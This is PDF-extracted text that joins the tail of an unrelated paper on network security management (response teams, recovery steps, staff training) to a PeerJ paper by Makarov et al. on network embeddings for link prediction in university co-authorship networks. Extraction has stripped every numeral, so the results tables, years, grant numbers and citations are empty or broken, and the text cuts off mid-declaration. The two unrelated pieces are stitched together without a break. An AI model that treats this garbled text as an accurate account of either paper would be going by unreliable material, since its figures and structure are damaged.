network operation situation. a) safety management group. the group monitors and manages the entire network system and coordinates the work of the group and other groups. when attacked, the system is resumed with the other groups. b) emergency response team. responsible for security technology research and development, providing expert help to other groups to help them isolate, control, and resolve intrusion and attacks. in the case of attack, it is able to respond quickly and provide solutions. c) intrusion detection team. it is responsible for uninterrupted network security detection, and to collect security information legally, and provide security information for other groups at any time. the system backup work is done in collaboration with the operation department to support the recovery work after the attack. ) improve fast response and resilience response and recovery plans are formulated in each key infrastructure and key information of each category in the system. in the case of attack, it can be controlled in time, at least to ensure the minimum operation of the network, so that the work of other departments is less affected. when an attack occurs, the response is as follows: a) the rapid control of the intruders and blocking the access to the system. b) other more stringent defense measures are quickly launched. c) close the non-critical operating system. d) to enable the redundant takeover system in an emergency, and so on. after blocking the invasion, it is necessary to quickly restore or rebuild the system that is attacked or infected, and should have the corresponding recovery capability for different attacks. a) physical recovery, set up spare equipment, and dredge the network as soon as possible. b) the soft and hardware loopholes in the repair system. c) repair or replace damaged soft and hardware resources. d) recover the damaged data from the backup database as soon as possible. e) when the time and technical conditions are allowed, the intrusion information is analyzed and the source of invasion is traced. if necessary, information is provided to the public security organs. advances in computer science research, volume ) prioritization of key facilities and information, and level management. prioritize key facilities and information. the more sensitive information and the facilities that have a great impact on the operation, the more valuable it is. at the same time, they are more likely to encounter risks. therefore, we need to take more secure measures for facilities and information with high priority, so that intruders can't encroach on critical facilities and obtain confidential information in a general way. even if you get it, you can't parse the actual meaning of the information. ) pay attention to the collection and exchange of information, consistent with national law in order to ensure the security of the network, it is necessary to establish a reliable, unimpeded and special communication channel. establish a unified safety standard. the network management department should work closely with other departments to share security information and strengthen the research and development of security related technologies. ) pay attention to the training and employment of talents and strengthen the construction of institutions invite some information security experts to carry out continuous safety training for the existing network managers, actively hire and educate other personnel to make up for the lack of safety talents. in addition, we have to establish a team of part-time security administrators. ) strengthen the construction of the system and improve the management level under the guidance of national law, the current regulations and regulations are constantly revised and perfected. it provides a legal framework for the security of information network, and constantly improves the management level. ) strengthen the safety education for all kinds of personnel so as to make the public understand the necessity of improving the network security. improve the public awareness of network security, enhance the threat to the information system and their understanding and understanding of their characteristics. improve the ability of our defended invaders to attack before the disastrous events come iii. conclusion at present, the problem of network security has become a serious form that affects the national security and social stability. the implementation of network security plan has shown profound practical significance. in the long process of security assurance, the network security plan is just the first step, but we can be sure that the problem of network security will also receive more and more attention. reference [ ] gu huaxiang. the legal measures and enlightenment for the security of information security abroad [j]. reform of administrative managemen. ( ): - . [ ] ma minhu. internet security law [m]. xi'an jiao tong university press. . [ ] zhang lei. development of computer information network technology [j]. computer knowledge and technology. ( ): - . [ ] wei suming. discussion on the computer information network security technology and security measures [j]. electronics world. ( ): - . advances in computer science research, volume dual network embedding for representing research interests in the link prediction problem on co-authorship networks dual network embedding for representing research interests in the link prediction problem on co-authorship networks ilya makarov , , olga gerasimova , pavel sulimov and leonid e. zhukov school of data analysis and artificial intelligence, national research university higher school of economics, moscow, russia faculty of computer and information science, university of ljubljana, ljubljana, slovenia abstract we present a study on co-authorship network representation based on network embedding together with additional information on topic modeling of research papers and new edge embedding operator. we use the link prediction (lp) model for constructing a recommender system for searching collaborators with similar research interests. extracting topics for each paper, we construct keywords co-occurrence network and use its embedding for further generalizing author attributes. standard graph feature engineering and network embedding methods were combined for constructing co-author recommender system formulated as lp problem and prediction of future graph structure. we evaluate our survey on the dataset containing temporal information on national research university higher school of economics over years of research articles indexed in russian science citation index and scopus. our model of network representation shows better performance for stated binary classification tasks on several co-authorship networks. subjects artificial intelligence, data mining and machine learning, digital libraries, network science and online social networks, world wide web and web science keywords co-occurrence network, network embedding, machine learning, link prediction, recommender systems, co-authorship networks introduction nowadays, researchers struggle to find relevant scientific contributions among large variety of international conferences and journal articles. in order not to miss important improvements in various related fields of study, it is important to know the current state-of-art results while not reading all the papers tagged by research interests. one of the solutions is to search for the most “important” articles taking into account citation or centrality metrics of the paper and the authors with high influence on specific research field (liang, li & qian, ). however, such method does not include collaborative patterns and previous history of research publications in co-authorship. it also does not measure the author professional skills and the ability to publish research results according to paper influence metrics, for example, journal impact factor. we study the problem of finding collaborator depending on his/her research community, the quality of publications and structural patterns based on co-authorship network suggested by newman ( a, b). early unsupervised learning approaches how to cite this article makarov i, gerasimova o, sulimov p, zhukov le. . dual network embedding for representing research interests in the link prediction problem on co-authorship networks. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted december published january corresponding author ilya makarov, iamakarov@hse.ru academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright makarov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:iamakarov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ for community detection in research networks were studied in morel et al. ( ), cetorelli & peristiani ( ), yan & ding ( ), and velden & lagoze ( ). a review on social network analysis and network science can be found in wasserman & faust ( ), barabási & pósfai ( ), and scott ( ). we focus on the link prediction (lp) problem (liben-nowell & kleinberg, ) in order to predict links in temporal networks and restore missing edges in complex networks constructed over noisy data. the lp algorithms can be used to extract the missing link or to detect abnormal interactions in a given graph, however, the most suitable case is to use lp for predicting the most probable persons for future collaboration, which we state as a problem of recommending a co-author using lp ranking (li & chen, ). our model is designed to predict whether a pair of nodes in a network would have a connection. we can also predict the parameters of such an edge in terms of publication quality or number of collaborators corresponding to the predicted link (makarov et al., a, b). in general, lp algorithms are widely used in several applications, such as web linking (adafre & de rijke, ), search for real-world friends on social networks (backstrom & leskovec, ), citation recommender system for digital libraries (he et al., ). a complete list of existing applied lp techniques can be found in srinivas & mitra ( ). recently, the improvement of machine learning techniques shifted the attention from manual feature engineering to the vectorized information representation. such methods have been successfully applied for natural language processing and now are tested on network topology representation despite the fact that an arbitrary graph could not be described by its invariants. the approach of representing network vertices by a vector model depending on actor’s neighborhood and similar actors is called graph (network) embedding (perozzi, al-rfou & skiena, ). the current progress of theoretical and practical results on network embeddings (perozzi, al-rfou & skiena, ; tang et al., ; chang et al., ; grover & leskovec, ) shows state-of-art performance on such problems as multi-class actor classification and lp. although, the existing methods use not only structural equivalence and network homophily properties, but also the actor attributes, such as labels, texts, images, etc. a list of surveys on graph embedding models and applications can be found in cai, zheng & chang ( ), cui et al. ( ), goyal & ferrara ( ), and chen et al. ( ). in this paper, we study a co-authorship recommender system based on co-authorship network where one or more of the coauthors belong to the national research university higher school of economics (nru hse) and the co-authored publications are only those indexed in scopus. we use machine learning techniques to predict new edges based on network embeddings (grover & leskovec, ; wu & lerman, ) and edge characteristics obtained from author attributes. we compare our approach with state-of-the-art algorithms for the lp problem using structural, attribute and combined feature space to evaluate the impact of the suggested approach on the binary classification task of predicting links in co-authorship network. such an obtained system could be applied for expert search, recommending collaborator or scientific adviser, and searching for relevant research publications similar to the work proposed in makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ makarov, bulanov & zhukov ( ) and makarov et al. ( a). in what follows, we describe solution to the lp problem leading to evaluation of our recommender system based on co-authorship network embeddings and manually engineered features for hse researchers. related work link prediction the lp problem was stated in liben-nowell & kleinberg ( ), in which liben-nowell and kleinberg proposed using node proximity metrics. the evaluation of the proposed metrics for large co-authorship networks showed promising results for predicting future links based on network topology without any additional information on authors. unsupervised structural learning was proposed in tang & liu ( ). gao, denoyer & gallinari ( ) presented temporal lp based on node proximity and its attributes determined by the content using matrix factorization. two surveys on lp methods describe core approaches for feature engineering, bayesian approach and dimensionality reduction were presented in hasan & zaki ( ), lü & zhou ( ). survey on lp was published in wang et al. ( ). the simplest baseline solution using network homophily is based on common neighbors or other network similarity scores (liben-nowell & kleinberg, ). however, the gao et al. ( ) that the similarity measures are not robust to the network global properties and, thus, could noise the prediction model with similarity scores only. the impact of the attribute-based formation in social networks was considered in robins et al. ( ) and mcpherson, smith-lovin & cook ( ). all these observations require feature engineering depending on the domain. graph-based recommender systems formulated via lp problem were suggested in chen, li & huang ( ), liu & kou ( ), and li & chen ( ). in kossinets & watts ( ), studied the effect of homophily in a university community. they considered temporal co-authorship network accompanied with author attributes and concluded the influence of not only structural proximity, but also author homophily for the social network structure. another approach focusing on interdisciplinary collaboration inside the university was presented in cho & yu ( ). the authors used the existing co-authorship network and academic information for university of bristoll and proposed a new lp model for co-authorship prediction and recommendation. kong et al. ( ) developed a scientific paper recommender system called voprec. however, in contrast to our work they constructed vector representation of research papers in citation networks. their system uses both text information represented with word embedding to find papers of similar research interest and structural identity converted into vectors to find papers of similar network topology. to combine text and structural informations with the network, vector representation of article can be learned with network embedding. network embedding in general, knowledge retrieval and task-dependent feature extraction would require domain-specific expert to construct a real-value feature vector for nodes and edges makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ representation. the quality of such an approach will be influenced by particular tasks and expert work, while not being scalable for large noisy networks. recently, the theory of hidden representations has impacted on machine learning and artificial intelligence. it shifted the attention from manual feature engineering to defining loss function and then solving optimization task. the early works on network vectorized models were presented in local linear embedding (roweis & saul, ), isomap (tenenbaum, de silva & langford, ), laplacian eigenmap (belkin & niyogi, ), spectral clustering (tang & liu, ), mfa (yan et al., ), and grarep (cao, lu & xu, ). these works try to embed the networks into real-value vector space using several proximity metrics. however, development of representation learning for networks was in stagnation due to the non-robust and non-efficient machine learning methods of dimensionality reduction based on network matrix factorization or spectral decomposition. these methods were not applicable for large networks and noisy edge and attribute data providing low accuracy and having high time complexity of constructing embedding. the modern methods of network embedding try to improve the performance on several typical machine learning tasks using conditional representation of a node based on its local and global neighborhood defined via random walking. the first-order and second-order nodes proximity were suggested in line (tang et al., ) and sdne (wang, cui & zhu, ) models. generalizing this approach, deepwalk (perozzi, al-rfou & skiena, ) and node vec (grover & leskovec, ) algorithms use skip-gram model (mikolov et al., ) based on simulation of breadth-first sampling and depth-first sampling. although, in carstens et al. ( ), carstens et al. showed some drawbacks of node vec (grover & leskovec, ) graph embedding, it still remained competitive structural-only embedding for representing both, homophily and structural equivalence in the network. its generalization on global network representation learning from wu & lerman ( ) shows comparable results with the original model. several works cover the node attributes, such as label and text content (see tadw; yang et al., , lane; huang, li & hu, ). in tridnr paper, pan et al. ( ) proposed to separately learn structural embedding from deepwalk (perozzi, al-rfou & skiena, ) and content embedding via doc vec (le & mikolov, ). on the contrary, asne (liao et al., ) learns combined representations for structural and node attribute representation using end-to-end neural network. we focus on graph embedding and feature engineering methods applied to an lp task on a particular network, consisting of hse researchers co-authored at least one paper with additional attributes representing authors. using network features only fails to include the information about actors obtained from the other sources, thus decreasing efficiency of network embeddings. we aim to include information on feature space of author’s research interests using data from the scopus digital library containing manually input and automatically selected keywords for each research article. based on this information, we constructed keywords co-occurrence network and consider its embedding for further generalizing author attributes. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dataset description and preprocessing we use the nru hse portal (national research university higher school of economics, ) containing information on research papers co-authored by at least one hse researcher, which were later uploaded to the portal by one of co-authors. the hse database contains information on over , hse researchers published over , research papers. the portal site contains web interface for the researchers to extract metadata of publications for a given time period and could be used by external researchers. the database records contain information on title, list of authors, keywords, abstract, year and place, journal/conference and publishing agency, and indexing flags for scopus, web of science (wos) core collection and russian science citation index (rsci). unfortunately, the database has no interface for managing bibliography databases and has no integration with synchronizing of indexing digital libraries compared to scholar google or personal researcher profile management services such as researcherid or orcid. as a consequence, a large amount of noisy data occurs due to such problems as author name ambiguity or incorrect/incomplete information on the publications. in order to resolve the ambiguity, we considered standard disambiguation approaches for predicting necessity to merge authors. we used levenshtein distance (useful for records with one-two error letters) for abbreviated author last and first names and then validated by two thresholds whether to merge two authors with the same abbreviation in the database based on cosine similarity and common neighbors metrics. the threshold values have been found manually via validation on small labeled set of ambiguous records. the number of authors with ambiguous writing does not exceed % of the whole database. we have also removed all non-hse authors due to lack of information on their publications in hse dataset. we also retrieved the scopus database of research papers co-authored by researchers from nru hse and indexed by elsevier ( ). the database contains information on paper author list, document title, year, source title, volume, issue, pages, source and document type, doi, author keywords, index keywords. we also added the information on research interests based on scopus subject categories for the journals, in which authors have published their articles. we manually inputted the research interest list according to rsci categorization in order to fill the lack of keywords and attributes for the papers. we then stated the problem of indexing author research interests in terms of keywords attached to paper description in both databases, and retrieved from hse dataset using the bigartm (vorontsov et al., ) topic modeling framework. for the scopus dataset, we use automatically chosen keywords previously prepared by the service together with manually input by authors list of keywords. we also uses additional keywords written in terms of subject categories of journals and proceedings according to the indexing in scopus and wos research paper libraries. these two datasets (hse, scopus) have common papers; however hse dataset contains many noisy data and, unfortunately, low-level publications not indexed outside rsci, while scopus contains precise information on % number of papers and exact research makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interest representation while lacking weak connections on authors written only poor- quality papers. we visualized the hse network with author names as node labels shown in the fig. while visualizing edge width as the cumulative quantity of joint publications based on the figure visualization of hse co-authorship network. we plot the whole hse co-authorship network (a) and its subgraphs induced by local proximities around influential persons from our university such as rector kuzminov y.i. (b), first vice-rector responsible for science gokhberg l.m. (c), and university research supervisor yasin e.g. (d). full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ papers’ quartiles and their number. in particular, we plotted the whole network structure (fig. a) and zoomed parts corresponding dense communities with the most influential persons from our university such as rector kuzminov y.i. (fig. b), first vice-rector responsible for science gokhberg l.m. (fig. c), and university research supervisor yasin e.g. (fig. d). it is easy to see that rector co-authors are people responsible for core direction of university development and vice rectors realizing university strategy in research, education, government, expert, and company areas of collaboration. on the other hand, from dense subgraphs one can find exact matches of university staff departments, such as research institutes, such as institute for industrial and market studies headed by yakovlev a.a. or institute for statistical studies and economics of knowledge headed by l.m. gokhberg. we show that network could visualize the most important administrative staff units and their heads thus giving insight on the connection of publication activity and administrative structure of hse university. feature engineering our new idea was to obtain additional edge attributes that were embed based on keywords network as a part of model evaluation. we constructed the network of stemmed keywords co-occurrence. to construct this network, we used the principle that two nodes were connected if corresponding keywords occurred in the same paper. for a given list of keywords, we built standard node vec embedding (grover & leskovec, ). next, for each author the most frequent and relevant keyword was defined, and its embedding was used as node additional feature vector for our lp tasks. we considered the problem of finding authors with similar interests to a selected one as collaboration search problem. in terms of social network analysis, we studied the problem of recommending similar author as lp problem. we operate with authors similarity and use similarity scores described in liben-nowell & kleinberg ( ) as baseline for network descriptors for pairs of nodes presented in table . so, we represented each node by vector model of author attributes using manually engineered features such as hse staff information and publication activity represented by centralities of co-authorship network and descriptive statistics. we added graph embeddings for author research interests and node proximity and evaluated different combinations of models corresponding to node feature space representation. link embeddings to use node vec, we obtained the vector node representations. the node vec embedding parameters were chosen via roc–area under the curve (auc) optimization over embedding size with respect to different edge embedding operators. for edge embedding we applied specific component-wise functions representing edge to node embeddings for source and target nodes of a given edge. this model was suggested in grover & leskovec ( ), in which four functions for such edge embeddings were presented (see first four rows in table ). we leave an evaluation of the approaches from abu-el-haija, perozzi & al-rfou ( ), which use bi-linear form learning from reduced by deep neural makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network node embedding, for the future work while also working on a new model of joint node-edge graph embedding, similar to (goyal et al., ). presented in the paper model suggests simple generalization of the idea of pooling first-order neighborhood of nodes while constructing edge embedding operator, which is much faster than dimensionality reduction approaches. we evaluated our model on two additional functions involving not only edge source and target node representations, but also their neighborhood representations as average over all the nodes in first-order proximity. these measures were first presented in makarov et al. ( b) but were not properly evaluated. the resulting list of link embeddings is presented in table . for each author, we also chose the most frequent keyword in the co-occurrence network and then constructed general embedding using node vec with automatically chosen parameters. table similarity score for a pair of nodes u and v with local neighborhoods n(u) and n(v) correspondingly, and for vectors corresponding to two authors research interests x and y. similarity metric definition common neighbors jn(u) \ n(v)j jaccard coefficient jnðuÞ \ nðvÞj jnðuÞ [ nðvÞj adamic-adar score x w nðuÞ\nðvÞ ln jnðwÞj preferential attachment jn(u)j · jn(v)j graph distance length of shortest path between u and v metric score þ jjx � yjj cosine score ðx; yÞ jjxjjjjyjj pearson coefficient covðx; yÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðx; xÞ p � ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðy; yÞ p generalized jaccard p minðxi; yiÞp maxðxi; yiÞ table binary operators for computing vectorized (u, v)-edge representation based on node attribute embeddings f(x) for ith component for f(u, v). symmetry operator definition average fiðuÞ þ fiðvÞ hadamard fi(u) · fi(v) weighted-l jfi(u) - fi(v)j weighted-l (fi(u) - fi(v)) neighbor weighted-l p w nðuÞ[fug fiðwÞ jnðuÞj þ � p t nðvÞ[fvg fiðtÞ jnðvÞj þ ���� ���� neighbor weighted-l p w nðuÞ[fug fiðwÞ jnðuÞj þ � p t nðvÞ[fvg fiðtÞ jnðvÞj þ � � makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ overall edge embedding contained several feature spaces described by the following list : ( ) edge embedding based on node vec node embeddings ( ) edge embedding based on node vec embedding for keywords co-occurrence network ( ) network similarity scores (baselines in liben-nowell & kleinberg ( )) - common neighbors - jaccard’s coefficient - adamic-adar score - preferential attachment - graph distance ( ) author similarity scores - cosine similarity - common neighbors - jaccard’s generalized coefficient - pearson’s correlation coefficient - metric score training model we consider machine learning models for binary classification task of whether for a given pair of nodes there will be a link connecting them based on previous or current co-authorship network. we compare logistic regression with lasso regularization, random forest, extreme gradient boosting (xgboost), and support vector machine, in short svm, models. we use most common machine learning frameworks which we shortly describe below. logistic lasso regression is a kind of linear model with a logit target function, in addition, lasso regularization sets some coefficients to zero, effectively choosing a simpler model that reduces number of coefficients. random forest and gradient boosting are an ensemble learning methods. the former operates by constructing a multitude of decision trees, the latter combines several weak models building the model in a stage-wise fashion and generalizes them by allowing optimization of an arbitrary differentiable loss function. random forest adds additional randomness to the model, while growing the trees. instead of searching for the most important feature while splitting a node, it searches for the best feature among a random subset of features. svm constructs a hyperplane that has the largest distance to the nearest training-data point of any class when it achieves a good classification. we use standard classification performance metrics for evaluating quality such as precision, accuracy, f -score (micro, macro), log-loss, roc–auc. next, we shortly define them. precision is a measure that tells us what proportion of publications that we diagnosed as existing, actually had existed. accuracy in classification problems is the number of correct makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ predictions made by the model over all kinds predictions made. recall is a measure that tells us what proportion of publications that actually had existed was diagnosed by the algorithm as existing. to balance these metrics, f -score is calculated as a weighted mean of the precision and recall. micro-averaged metrics are usually more useful if the classes distribution is uneven by calculating metrics globally to count true and false predictions, macro-averaged are used when we want to evaluate systems performance across on different classes by calculating metrics for each label. log-loss, or logarithmic loss, is a “soft” measurement of accuracy that integrates the idea of probabilistic confidence. in binary classification log-loss can be calculated as � n � pn i¼ ðyi � logðpiÞ þ ð � yiÞ � logð � piÞÞ, where yi is a binary indicator ( or ) checking the correctness of classification for observation i, pi is a predicted probability observation i for a given class. log-loss measures the unpredictability of the “extra noise” that comes from using a predictor as opposed to the true labels. roc–auc, aka area under the receiver operating characteristic curve, is equal to the probability that a classifier will rank a randomly chosen existing edge higher than a randomly chosen non-existing one. roc curves typically feature rate of true predicted existing publications on the y axis, and rate of false predicted existing publications on the x axis. the larger auc is usually better. all metrics were averaged using fivefold cross validation with five negative sampling trials for a fixed train set, which we describe below. in our lp problem for the co-authorship network, we have two possible formalizations of predicting links. we consider either temporal network structure using information from the previous years to predict links corresponding the current year or the whole network to predict missing links. for the first task, we use combined hse+scopus dataset of publications and learn to predict papers appearing at year. we test our model shifting years on year ahead and evaluate our predictions for year based on publications until year. for the second task, we remove % of existing edges preserving connectivity property from our dataset and add negative sampling of the same size as a number of edges left in order to balance classes for classification problem. in table for the future links prediction task, we compare chosen predictive models fixing one neighbor weighted-l link operator to construct edge embeddings considered as model features. it is interesting to see that xgboost model get significantly overfitted while the best model appear to be support vector machine. in table and in further tables we highlight the best values of quality metrics in bold. table comparing machine learning models based on the neighbor weighted-l link embedding applied to future links prediction on the scopus dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc logistic regression . . . . . . random forest . . . . . . gradient boosting . . . . . . svm . . . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in what follows, we aim to compare several link embedding metrics (see table ) for the best machine learning model. to evaluate our approach for the first task on scopus dataset, we can see in table that suggested by authors new link embedding outperforms existing approaches by all the binary classification quality metrics. as for the second task, we evaluate lp task over hse and scopus datasets in terms of predictive models and link embeddings. in tables and , we could see that the svm model outperforms the other model on the hse dataset but random forest gets the best auc for the scopus dataset, being competitive with the xgboost and svm models (svm performs slightly better). this could happen due to sparse data in scopus publications after removing % link information and lack of ensemble methods for choosing proper negative sampling for such a sparse dataset. in tables and , we could see that the suggested local proximity operator for link embedding that we call neighbor weighted-l link embedding outperforms all the other approaches for embedding edges based on node vector representations. to choose the best predictive model and edge embedding operator, we consider several feature space combination based on list . the results of their comparison are shown in table for the first task and in table for the second task of lp (the original results appear in makarov et al. ( b)). table comparing link embeddings for future links prediction on the scopus dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc average . . . . . . hadamard . . . . . . weighted-l . . . . . . weighted-l . . . . . . neighbor weighted-l . . . . . . neighbor weighted-l . . . . . . table comparing machine learning models based on the neighbor weighted-l link embedding for link prediction problem on the hse dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc logistic regression . . . . . . random forest . . . . . . gradient boosting . . . . . . svm . . . . . . table comparing machine learning models based on the neighbor weighted-l link embedding for link prediction problem on the scopus dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc logistic regression . . . . . . random forest . . . . . . gradient boosting . . . . . . svm . . . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we could see that adding embedding of author research interests as well as the author embedding itself play significant role in improving prediction quality for both tasks. when considering only structural embedding or node similarity features, we obtained worse results in terms of all binary classification quality metrics. in both tasks, the combined approach with direct node similarity scores does not improve the quality of prediction overfitting the model on particular properties thus influencing the predictions for network with missing links. makarov et al. ( a) evaluate their recommender system on including research interests based only on subject categories from the respective journals index in scopus. it leads to worse results for lp for the authors with small number of research publication, so they succeeded only predicting so-called strong connections for authors writing at least three to five papers in co-authorship. our approach table comparing link embeddings for the link prediction problem on the scopus dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc average . . . . . . hadamard . . . . . . weighted-l . . . . . . weighted-l . . . . . . neighbor weighted-l . . . . . . neighbor weighted-l . . . . . . table prediction of publications for year based on ≤ years information. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc ( ) . . . . . . ( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( )+( ) . . . . . . ( )+( )+( ) . . . . . . ( )+( )+( )+( ) . . . . . . table comparing link embeddings for the link prediction problem on the hse dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc average . . . . . . hadamard . . . . . . weighted-l . . . . . . weighted-l . . . . . . neighbor weighted-l . . . . . . neighbor weighted-l . . . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ allows to work with arbitrary research interest representation thus making it possible to use recommender system for novice researchers with small or zero connections in the network. experiments for a large network to evaluate scalability of our results, we considered the lp task for the large network called aminer (tang et al., ). this network describes collaborations among the authors and contains , , nodes and , , edges. for constructing node embeddings we used node vec with model parameters p, q = ( , ), embedding dimension d = , length of walk per node equaled l = , and number of walks per node equaled n = . we decreased values of l and n in comparison with default values, because our computer terminated process due to memory issues. we studied the impact of train/test split on different edge embeddings operators while fixing logistic regression model for lp. we considered train set, consisting of %, %, %, % of the graph edges while averaging binary classification quality metrics over five negative sampling providing negative examples for non-existent edges. we compared the log-loss (figs. a and b) and accuracy (figs. c and d) metrics computed for train and test sets using different edge embeddings. as a result, we obtained that hadamard and neighbor weighted-l edge embedding operators represent highly accurate results while trained on sparse data from the original graph. moreover, increasing the size of train data (which is the case for our temporal co-authorship network) the hadamard product becomes inferior to our neighbor weighted-l operator. in addition, the neighbor weighted-l operator also showed greater performance in contrast to the hse dataset. it was interesting to find out that overall performance of node vec node embedding model produces very precise results for lp task, which may vary depending on graph as was shown in grover & leskovec ( ). discussion we have obtained that combined approach of embedding co-authorship and keywords co-occurrence networks, while preserving several author attributes leads to significant improvement in the classification quality metrics for predicting future links and lp tasks. however, we will continue to experiment with node vec model. the ( ) feature space table link prediction for year on the scopus dataset. precision accuracy f -score (macro) f -score (micro) log-loss roc–auc ( ) . . . . . . ( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( ) . . . . . . ( )+( )+( ) . . . . . . ( )+( )+( ) . . . . . . ( )+( )+( )+( ) . . . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from the list is node vec model with d = (compared also on d = ) and parameters p, q = ( , . ) obtained by us via model fitting on a given d and logistic regression baseline model. the small q value shows that considering local proximity was more important than proximities of highest orders. however, we aim to further study this question taking into account modern methods of graph auto-encoders (kipf & welling, ). we are further working on a new embedding model called jonne learning high quality node representations in tandem with edge representations. we proved the embeddings learned by jonnee is almost always superior then of those learned by state-of-the-art models of all different types: matrix factorization based, sequence-based and deep learning based but the model has a certain drawback of longer training similar to matrix factorizations but less parallelizable, thus giving us the dilemma to choose between quality and processing speed of suggested solution for edge embedding construction. figure low log-loss and high accuracy (plotted log-scale y-axis) represent the best edge embedding. we show that neighbor weighted-l and neighbor weighted-l operators are on par with the state-of-art hadamard product presented in grover & leskovec ( ) and outperform it when train data size increases based on log-loss (a and b) and accuracy (c and d) metrics computed for train and test sets. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while the lp task still remains hard problem for network analysis, its application to matching collaborators based on structural, attribute and content information shows promising results on applicability of graph-based recommender system predicting links in the co-authorship network and incorporating author research interests in collaborative patterns. we aim to generalize the model based on full-text extraction of research interests from collections of source documents and studying deep learning solutions for representing combined embedding of structural and content information for co- authorship networks. the code for computing all the models with respect to classification evaluation, choosing proper edge embedding operator and tuning hyper-parameters of node embeddings will be uploaded on github (http://github.com/makarovia/jcdl /) including the hse and scopus datasets. conclusion we have improved recommender systems (makarov, bulanov & zhukov, ; makarov et al., a) based on choosing proper link embedding operator (makarov et al., b) and including research interest information presented as embedding of nodes in keywords co-occurrence network connecting keywords relating to a given research article. we have compared several machine learning models for future and missing lp problems interpreted as a binary classification problem. the edge embedding operator suggested by makarov et al. ( b) edge embedding operator called neighbor weighted-l (see table ) outperforms all the other edge embedding functions due to involving the neighborhood of the edge in the graph and was properly evaluated in this paper for both tasks. among the machine learning models, svm outperforms all the others except the lp problem on the sparse scopus dataset while xgboost was significantly overfitted; however, training svm for large graphs is computationally hard. such a constructed model may be considered as a recommender system for searching collaborators based on mutual research interests and publishing patterns. the recommender system demonstrates good results on predicting new collaborations between existing authors even if they have small number of data in co-authorship network due to availability of their research interests. we are looking forward to the evaluation of our system for universities, who have to deal with the problems of finding an expert based on text for evaluation, matchmaking for co-authored research papers with novice researchers, searching for collaborators on specific grant proposal or proper scientific advisers. focusing only on machine learning task is not suitable for real-world application involving social interactions, so we aim to implement framework with the possibility to manually add positive and negative preferences for collaboration recommendations, thus providing a useful service which could be integrated in university business process of managing researchers’ publication activity. our system may also be used for predicting the number of publications corresponding to a given administrative staff unit using network collaborative patterns and thus able to evaluate the efficiency of the authors or the whole staff. it also may be used for makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://github.com/makarovia/jcdl / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ suggesting collaborations between separate staff units by considering combined network with staff units as vertices and weighted by the number of publications mutual connections between them. evaluating such a network for hse university give us the picture that most popular faculties of economics and management have a lot of mutual connections due to many researchers working at these faculties, but limiting these connection only on scopus publication leads to the influence of computer science and engineering faculties which showed trend of computer science research in applied sciences. we leave for the future work consideration of the applicability of our system which suggests a new university publication strategy based on collaboration patterns and invites researchers to compare the existing solutions on the hse researchers’ dataset. acknowledgements a part of the article is extended and revised version of presented oral talk at international conference aist’ and posters at acm/ieee jcdl’ , websci’ and sunbelt’ . we thank all the colleagues from nru hse participated in discussion of this research. additional information and declarations funding the work was supported by the russian science foundation under grant - - and performed at the national research university higher school of economics, russia. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . national research university higher school of economics, russia. competing interests the authors declare that they have no competing interests. author contributions � ilya makarov conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � olga gerasimova performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. � pavel sulimov performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. � leonid e. zhukov conceived and designed the experiments, analyzed the data, performed the computation work, approved the final draft. makarov et al. ( ), peerj 